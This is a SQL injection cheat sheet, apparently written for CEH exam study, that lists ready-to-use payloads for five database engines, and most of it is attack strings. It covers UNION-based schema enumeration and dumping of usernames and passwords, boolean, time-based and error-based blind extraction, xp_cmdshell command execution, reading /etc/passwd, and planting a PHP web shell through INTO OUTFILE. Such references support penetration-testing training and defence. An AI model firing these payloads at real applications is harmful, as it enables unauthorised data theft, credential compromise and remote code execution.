UNION-Based

Replace <N> with detected column count; place exfil fields in displayed positions. Remember to concatenate columns if you are constrained from a low N number:

GROUP_CONCAT(column)

MySQL/MariaDB

# Check context
' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT 1,2,3-- 

# DB / User / Version
' UNION SELECT DATABASE(),USER(),VERSION()-- 

# List DBs/Tables/Columns
' UNION SELECT NULL,NULL,schema_name,NULL FROM information_schema.schemata-- 
' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables-- 
' UNION SELECT table_schema,table_name,column_name FROM information_schema.columns-- 

# Dump example
' UNION SELECT username,password,NULL FROM app.users--

Microsoft SQL Server (MSSQL)

-- Find columns
' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT 1,2,3-- 

-- DB / User / Version
' UNION SELECT DB_NAME(),SYSTEM_USER,@@VERSION-- 

-- Enumerate
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- 
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='Users'-- 

-- Old-school sysobjects/syscolumns
' UNION SELECT name,NULL,NULL FROM sysobjects WHERE xtype='U'--    -- 'U' = user table
' UNION SELECT c.name,NULL,NULL FROM syscolumns c JOIN sysobjects o ON c.id=o.id WHERE o.name='Users'--

PostgreSQL

' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT 1,2,3-- 

' UNION SELECT current_database(),current_user,version()-- 
' UNION SELECT table_schema || '.' || table_name,NULL,NULL FROM information_schema.tables-- 
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

Oracle

' UNION SELECT NULL FROM dual-- 
' UNION SELECT 1,2 FROM dual--    -- Oracle requires FROM clause; use DUAL

' UNION SELECT SYS_CONTEXT(''USERENV'',''CURRENT_SCHEMA''), USER FROM dual-- 
' UNION SELECT banner FROM v$version-- 

' UNION SELECT owner||''.''||table_name FROM all_tables-- 
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--

SQLite

' UNION SELECT 1,2,3-- 
' UNION SELECT sqlite_version(),NULL,NULL-- 
' UNION SELECT name,NULL,NULL FROM sqlite_master WHERE type='table'-- 
' UNION SELECT sql,NULL,NULL FROM sqlite_master WHERE name='users'-- 
-- Columns via pragma (usually needs out-of-band or in-app echo):
PRAGMA table_info(users);

BOOLEAN-Based BLIND

Generic patterns

' AND 1=1-- 
' AND 1=2-- 
" AND 'a'='a" -- 
" AND 'a'='b" --

DB-specific truth tests

MySQL: ' AND SLEEP(0)=0-- vs ' AND SLEEP(5)-- (time-based, see next)
MSSQL: ' AND 1=(SELECT 1)-- / ' AND 1=(SELECT 2)--
PostgreSQL: ' AND 1=(SELECT 1)--
Oracle: ' AND 1=(SELECT 1 FROM dual)--

Extracting bit-by-bit (concept)

' AND ASCII(SUBSTRING((SELECT DATABASE()),1,1)) > 77--

Time-Based BLIND

MySQL/MariaDB

' AND IF(1=1,SLEEP(5),0)-- 
' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1))>77,SLEEP(5),0)--

MSSQL

' IF (1=1) WAITFOR DELAY '0:0:5'-- 
' IF (ASCII(SUBSTRING(DB_NAME(),1,1))>77) WAITFOR DELAY '0:0:5'--

PostgreSQL

' || pg_sleep(5)-- 
' AND CASE WHEN (1=1) THEN pg_sleep(5) ELSE 0 END--

Oracle

' AND CASE WHEN 1=1 THEN dbms_lock.sleep(5) ELSE 0 END--

ERROR-Based

MySQL

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT DATABASE()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

MSSQL

' AND 1=CONVERT(int, (SELECT DB_NAME()))--    -- type cast error leaks value
' UNION SELECT 1/0--                          -- trigger error page with details

PostgreSQL

' AND CAST((SELECT current_database()) AS int)--

Oracle

' AND TO_NUMBER((SELECT banner FROM v$version WHERE ROWNUM=1))--

Error-based works only if the app prints DB errors. Many prod apps suppress them.

Stacked Queries (semicolon); Read/Write / OS Interaction

Only when DB/API allows stacked statements (common in MSSQL/PG/Oracle). Avoid illegal actions; shown for awareness.

MSSQL (classic)

'; EXEC xp_cmdshell 'whoami'-- 
'; DECLARE @c VARCHAR(200)='whoami'; EXEC xp_cmdshell @c-- 
'; CREATE TABLE t(x INT); INSERT INTO t VALUES (1)--

PostgreSQL

'; CREATE TABLE pwn(x text); INSERT INTO pwn VALUES (current_user);-- 
-- With superuser + untrusted languages/extensions, RCE is possible (outside CEH scope).

Oracle

'; BEGIN EXECUTE IMMEDIATE 'CREATE TABLE T(X INT)'; END;-- 
-- DBMS_SCHEDULER/UTL_HTTP abuses exist under high-priv roles.

MySQL via HTTP APIs typically disallow stacked queries; depends on driver. Out-of-band techniques (DNS exfil, etc.) may be used instead.

MSSQL Legacy Enumeration (sysobjects/syscolumns)

-- List user tables
' UNION SELECT name,NULL,NULL FROM sysobjects WHERE xtype='U'-- 

-- List columns in a table
' UNION SELECT c.name,NULL,NULL
  FROM syscolumns c
  JOIN sysobjects o ON c.id=o.id
  WHERE o.name='Users'-- 

-- Your snippet (xtype=CHAR(85) = 'U'):
UNION SELECT ALL name FROM sysobjects WHERE xtype=CHAR(85)

MySQL Privilege & File Tricks

-- Current file privs
' UNION SELECT @@secure_file_priv,NULL,NULL-- 

-- Read local file (if FILE privilege and path allowed)
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL-- 

-- Write webshell (very restricted in modern setups)
' UNION SELECT "<?php system($_GET[1]); ?>",NULL,NULL INTO OUTFILE '/var/www/html/s.php'--

Most modern servers block these via permissions/AppArmor/SELinux; CEH expects you to know the primitives, not necessarily use them in live exams.

PostgreSQL / Oracle Catalog Nuggets

PostgreSQL

-- All DBs
' UNION SELECT datname,NULL,NULL FROM pg_database-- 
-- All tables in current schema(s)
' UNION SELECT schemaname||'.'||tablename,NULL,NULL FROM pg_tables--

Oracle

-- Users
' UNION SELECT username FROM all_users-- 
-- Tables you can see
' UNION SELECT owner||'.'||table_name FROM all_tables-- 
-- Columns
' UNION SELECT owner||'.'||table_name||':'||column_name FROM all_tab_columns--

Context-Specific UNION

Replace X..N with column positions that render on the page.

2 Columns

' UNION SELECT 1,2-- 
' UNION SELECT @@version,2--       -- MSSQL example

3 Columns

' UNION SELECT 1,2,3-- 
' UNION SELECT DATABASE(),USER(),VERSION()--      -- MySQL example

5 Columns

' UNION SELECT 1,2,3,4,5-- 
' UNION SELECT 1,2,table_name,4,5 FROM information_schema.tables--

BLIND Extraction

Extract Nth char of string (MySQL)

' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 0,1),1,1))>77--

Binary search speedup (MySQL pseudo)

' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1)) BETWEEN 78 AND 90,SLEEP(2),0)--

MSSQL version char test

' IF (ASCII(SUBSTRING(CONVERT(varchar,@@version),1,1))>77) WAITFOR DELAY '0:0:3'--

Injections

UNION-Based

MySQL/MariaDB

Microsoft SQL Server (MSSQL)

PostgreSQL

Oracle

SQLite

BOOLEAN-Based BLIND

Generic patterns

DB-specific truth tests

Extracting bit-by-bit (concept)

Time-Based BLIND

MySQL/MariaDB

MSSQL

PostgreSQL

Oracle

ERROR-Based

MySQL

MSSQL

PostgreSQL

Oracle

Stacked Queries (semicolon); Read/Write / OS Interaction

MSSQL (classic)

PostgreSQL

Oracle

MSSQL Legacy Enumeration (sysobjects/syscolumns)

MySQL Privilege & File Tricks

PostgreSQL / Oracle Catalog Nuggets

PostgreSQL

Oracle

Context-Specific UNION

2 Columns

3 Columns

5 Columns

BLIND Extraction

Extract Nth char of string (MySQL)

Binary search speedup (MySQL pseudo)

MSSQL version char test